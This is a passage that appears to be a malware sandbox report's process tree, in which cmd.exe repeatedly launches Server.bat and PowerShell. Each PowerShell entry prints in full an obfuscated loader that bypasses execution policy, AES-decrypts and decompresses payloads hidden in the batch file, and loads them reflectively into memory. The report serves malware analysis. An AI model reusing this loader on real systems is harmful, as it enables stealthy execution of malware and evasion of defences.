        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        24⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        22⤵
        
        PID:2328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        23⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1356
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        21⤵
        
        PID:2552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        22⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2112
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        20⤵
        
        PID:1888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        21⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        19⤵
        
        PID:2524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2644
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        18⤵
        
        PID:2120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        19⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1612
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        17⤵
        
        PID:1724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        18⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1064
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        16⤵
        
        PID:864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        17⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1712
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        15⤵
        
        PID:2188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        16⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        14⤵
        
        PID:2792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        15⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1304
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        13⤵
        
        PID:1452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        14⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2716
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        12⤵
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2476
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        11⤵
        
        PID:2560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
